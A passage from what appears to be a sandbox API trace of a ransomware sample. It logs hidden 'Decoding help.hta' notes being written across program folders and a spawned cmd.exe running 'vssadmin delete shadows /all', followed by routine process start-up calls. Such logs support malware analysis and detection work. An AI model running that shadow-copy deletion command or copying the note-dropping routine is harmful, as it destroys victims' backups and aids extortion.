lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Decoding help.hta" [0060.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.578] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2feefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2feefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.580] CloseHandle (hObject=0x354) returned 1 [0061.580] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1023 os_tid = 0xcc0 [0060.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*", lpFindFileData=0x3002fd30 | out: lpFindFileData=0x3002fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5910 [0060.332] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.332] FindNextFileW (in: hFindFile=0x10bc5910, lpFindFileData=0x3002fd30 | out: lpFindFileData=0x3002fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.332] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.332] FindNextFileW (in: hFindFile=0x10bc5910, lpFindFileData=0x3002fd30 | out: lpFindFileData=0x3002fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fbf39ab, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x3fbf39ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xecdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0060.333] lstrcpyW (in: lpString1=0x10d3ea98, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*" [0060.333] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*") returned 70 [0060.333] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\Decoding help.hta" [0060.333] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\js\\decoding help.hta")) returned 0xffffffff [0060.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.577] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3002fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3002fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.578] CloseHandle (hObject=0x354) returned 1 [0061.578] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1024 os_tid = 0xcc4 [0060.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*", lpFindFileData=0x3016fd30 | out: lpFindFileData=0x3016fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5950 [0060.333] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.333] FindNextFileW (in: hFindFile=0x10bc5950, lpFindFileData=0x3016fd30 | out: lpFindFileData=0x3016fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.333] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.333] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.334] FindNextFileW (in: hFindFile=0x10bc5950, lpFindFileData=0x3016fd30 | out: lpFindFileData=0x3016fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104de, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.js", cAlternateFileName="")) returned 1 [0060.334] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*" [0060.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\*.*") returned 79 [0060.334] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\Decoding help.hta" [0060.334] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.334] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0061.580] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x3016fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x3016fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.581] CloseHandle (hObject=0x354) returned 1 [0061.581] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 1025 os_tid = 0xcc8 Thread: id = 1026 os_tid = 0xea4 Thread: id = 1027 os_tid = 0xea0 Thread: id = 1028 os_tid = 0xeb0 Thread: id = 1029 os_tid = 0xf14 Thread: id = 1030 os_tid = 0x6e4 Thread: id = 1031 os_tid = 0x7a4 Thread: id = 1032 os_tid = 0xb0 Thread: id = 1033 os_tid = 0x95c Thread: id = 1034 os_tid = 0xd30 Thread: id = 1035 os_tid = 0xa34 Thread: id = 1036 os_tid = 0xd1c Thread: id = 1037 os_tid = 0xd5c Thread: id = 1038 os_tid = 0xda4 Thread: id = 1039 os_tid = 0x110 Thread: id = 1040 os_tid = 0xe10 Thread: id = 1041 os_tid = 0xe2c Thread: id = 1042 os_tid = 0x61c Thread: id = 1043 os_tid = 0xb8c Thread: id = 1044 os_tid = 0xd34 Thread: id = 1045 os_tid = 0xbc8 Thread: id = 1046 os_tid = 0xd14 Thread: id = 1047 os_tid = 0xe20 Thread: id = 1048 os_tid = 0xe24 Thread: id = 1049 os_tid = 0xe18 Thread: id = 1050 os_tid = 0xc50 Thread: id = 1051 os_tid = 0x808 Thread: id = 1052 os_tid = 0x354 Thread: id = 1053 os_tid = 0x874 Thread: id = 1054 os_tid = 0x828 Thread: id = 1055 os_tid = 0xd08 Thread: id = 1056 os_tid = 0xd0c Thread: id = 1057 os_tid = 0xd10 Thread: id = 1058 os_tid = 0xbb4 Thread: id = 1059 os_tid = 0xe28 Thread: id = 1060 os_tid = 0x9e0 Thread: id = 1061 os_tid = 0xc3c Thread: id = 1062 os_tid = 0xdd4 Thread: id = 1063 os_tid = 0xba0 Thread: id = 1064 os_tid = 0xba8 Thread: id = 1065 os_tid = 0xe98 Thread: id = 1066 os_tid = 0xb84 Thread: id = 1067 os_tid = 0x930 Thread: id = 1068 os_tid = 0x4b0 Thread: id = 1069 os_tid = 0x5b4 Thread: id = 1070 os_tid = 0xf24 Thread: id = 1071 os_tid = 0xf60 Thread: id = 1072 os_tid = 0xf6c Thread: id = 1073 os_tid = 0x248 Thread: id = 1074 os_tid = 0x3d0 Thread: id = 1075 os_tid = 0x8cc Thread: id = 1076 os_tid = 0xaac Thread: id = 1077 os_tid = 0xed0 Thread: id = 1078 os_tid = 0xb04 Thread: id = 1079 os_tid = 0xc60 Thread: id = 1080 os_tid = 0xd48 Thread: id = 1081 os_tid = 0xd9c Thread: id = 1082 os_tid = 0x640 Thread: id = 1083 os_tid = 0x738 Thread: id = 1084 os_tid = 0xdf8 Thread: id = 1085 os_tid = 0xce8 Thread: id = 1086 os_tid = 0xe4c Thread: id = 1087 os_tid = 0xf40 Thread: id = 1088 os_tid = 0xa88 Thread: id = 1089 os_tid = 0xc10 Thread: id = 1090 os_tid = 0xbc4 Thread: id = 1091 os_tid = 0xbdc Thread: id = 1092 os_tid = 0x7e8 Thread: id = 1093 os_tid = 0x788 Thread: id = 1094 os_tid = 0xc4c Thread: id = 1095 os_tid = 0x894 Thread: id = 1096 os_tid = 0xbe4 Thread: id = 1097 os_tid = 0xeb4 Thread: id = 1098 os_tid = 0xabc Thread: id = 1099 os_tid = 0xaf4 Thread: id = 1100 os_tid = 0xe64 Thread: id = 1101 os_tid = 0x85c Thread: id = 1102 os_tid = 0xaf8 Thread: id = 1103 os_tid = 0x8a8 Thread: id = 1104 os_tid = 0x958 Thread: id = 1105 os_tid = 0x920 Thread: id = 1106 os_tid = 0xb98 Thread: id = 1107 os_tid = 0xb10 Thread: id = 1108 os_tid = 0xbd0 Thread: id = 1109 os_tid = 0x130 Thread: id = 1110 os_tid = 0x778 Thread: id = 1111 os_tid = 0xc58 Thread: id = 1112 os_tid = 0xf24 Thread: id = 1113 os_tid = 0xf60 Thread: id = 1114 os_tid = 0xf6c Thread: id = 1115 os_tid = 0x248 Thread: id = 1116 os_tid = 0x3d0 Thread: id = 1117 os_tid = 0x8cc Thread: id = 1118 os_tid = 0xaac Thread: id = 1119 os_tid = 0xed0 Thread: id = 1120 os_tid = 0xb04 Thread: id = 1121 os_tid = 0xc60 Thread: id = 1122 os_tid = 0xd48 Thread: id = 1123 os_tid = 0xd9c Thread: id = 1124 os_tid = 0x640 Thread: id = 1125 os_tid = 0x738 Thread: id = 1126 os_tid = 0xdf8 Thread: id = 1127 os_tid = 0xce8 Thread: id = 1128 os_tid = 0xe4c Thread: id = 1129 os_tid = 0xf40 Thread: id = 1130 os_tid = 0xa88 Thread: id = 1131 os_tid = 0xa8c Thread: id = 1132 os_tid = 0x520 Thread: id = 1133 os_tid = 0xa80 Thread: id = 1134 os_tid = 0xd04 Thread: id = 1135 os_tid = 0xf2c Thread: id = 1136 os_tid = 0xbdc Thread: id = 1137 os_tid = 0x7e8 Thread: id = 1138 os_tid = 0x788 Thread: id = 1139 os_tid = 0xc4c Thread: id = 1140 os_tid = 0x894 Thread: id = 1141 os_tid = 0xbe4 Thread: id = 1142 os_tid = 0x958 Thread: id = 1143 os_tid = 0x920 Thread: id = 1144 os_tid = 0xb98 Thread: id = 1145 os_tid = 0xb10 Thread: id = 1146 os_tid = 0xbd0 Thread: id = 1147 os_tid = 0x130 Thread: id = 1148 os_tid = 0x778 Thread: id = 1149 os_tid = 0xc58 Thread: id = 1150 os_tid = 0xd94 Thread: id = 1151 os_tid = 0xba4 Thread: id = 1152 os_tid = 0xb48 Thread: id = 1153 os_tid = 0xa78 Thread: id = 1154 os_tid = 0xb60 Thread: id = 1155 os_tid = 0xe80 Thread: id = 1156 os_tid = 0xe90 Thread: id = 1157 os_tid = 0xe94 Thread: id = 1158 os_tid = 0xd20 Thread: id = 1159 os_tid = 0xbd4 Thread: id = 1160 os_tid = 0xbac Thread: id = 1161 os_tid = 0xe84 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4dbc1000" os_pid = "0x9f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9c0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c vssadmin delete shadows /all" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x9fc [0037.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef9a0 | out: lpSystemTimeAsFileTime=0x2ef9a0*(dwLowDateTime=0x1ff56ed0, dwHighDateTime=0x1d526b8)) [0037.866] GetCurrentProcessId () returned 0x9f8 [0037.866] GetCurrentThreadId () returned 0x9fc [0037.867] GetTickCount () returned 0x19701 [0037.867] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef998 | out: lpPerformanceCount=0x2ef998*=15818325391) returned 1 [0037.868] GetModuleHandleA (lpModuleName=0x0) returned 0x49ef0000 [0037.868] __set_app_type (_Type=0x1) [0037.868] __p__fmode () returned 0x74eb31f4 [0037.881] __p__commode () returned 0x74eb31fc [0037.881] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f121a6) returned 0x0 [0037.881] __getmainargs (in: _Argc=0x49f14238, _Argv=0x49f14240, _Env=0x49f1423c, _DoWildCard=0, _StartInfo=0x49f14140 | out: _Argc=0x49f14238, _Argv=0x49f14240, _Env=0x49f1423c) returned 0 [0037.881] GetCurrentThreadId () returned 0x9fc [0037.881] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9fc) returned 0x60 [0037.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0037.882] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0037.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.882] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef930 | out: phkResult=0x2ef930*=0x0) returned 0x2 [0037.882] VirtualQuery (in: lpAddress=0x2ef967, lpBuffer=0x2ef900, dwLength=0x1c | out: lpBuffer=0x2ef900*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0037.882] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef900, dwLength=0x1c | out: lpBuffer=0x2ef900*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0037.882] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef900, dwLength=0x1c | out: lpBuffer=0x2ef900*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0037.882] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef900, dwLength=0x1c | out: lpBuffer=0x2ef900*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0037.882] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef900, dwLength=0x1c | out: lpBuffer=0x2ef900*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0037.882] GetConsoleOutputCP () returned 0x1b5 [0037.883] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0037.883] SetConsoleCtrlHandler (HandlerRoutine=0x49f0e72a, Add=1) returned 1 [0037.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.883] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0037.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.883] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f141ac | out: lpMode=0x49f141ac) returned 1 [0037.883] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.883] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0037.884] _get_osfhandle (_FileHandle=0) returned 0x3 [0037.884] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f141b0 | out: lpMode=0x49f141b0) returned 1 [0037.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0037.885] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0037.885] GetEnvironmentStringsW () returned 0x362040* [0037.885] GetProcessHeap () returned 0x350000 [0037.885] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x362b18 [0037.885] FreeEnvironmentStringsW (penv=0x362040) returned 1 [0037.885] GetProcessHeap () returned 0x350000 [0037.885] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4) returned 0x360c78 [0037.885] GetEnvironmentStringsW () returned 0x362040* [0037.885] GetProcessHeap () returned 0x350000 [0037.885] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xaca) returned 0x3635f0 [0037.886] FreeEnvironmentStringsW (penv=0x362040) returned 1 [0037.886] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8a0 | out: phkResult=0x2ee8a0*=0x68) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x0, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x1, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x1, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x0, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x40, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x40, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x40, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.886] RegCloseKey (hKey=0x68) returned 0x0 [0037.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8a0 | out: phkResult=0x2ee8a0*=0x68) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x40, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x1, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x1, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x0, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.886] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x9, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.887] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x4, lpData=0x2ee8ac*=0x9, lpcbData=0x2ee8a4*=0x4) returned 0x0 [0037.887] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee8a8, lpData=0x2ee8ac, lpcbData=0x2ee8a4*=0x1000 | out: lpType=0x2ee8a8*=0x0, lpData=0x2ee8ac*=0x9, lpcbData=0x2ee8a4*=0x1000) returned 0x2 [0037.887] RegCloseKey (hKey=0x68) returned 0x0 [0037.887] time (in: timer=0x0 | out: timer=0x0) returned 0x5d0a5c20 [0037.887] srand (_Seed=0x5d0a5c20) [0037.887] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c vssadmin delete shadows /all" [0037.887] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c vssadmin delete shadows /all" [0037.887] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f15260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0037.888] GetProcessHeap () returned 0x350000 [0037.888] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x362040 [0037.888] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x362048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0037.888] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.888] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.888] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0037.888] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0037.888] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0037.888] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0037.888] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0037.889] _wcsicmp 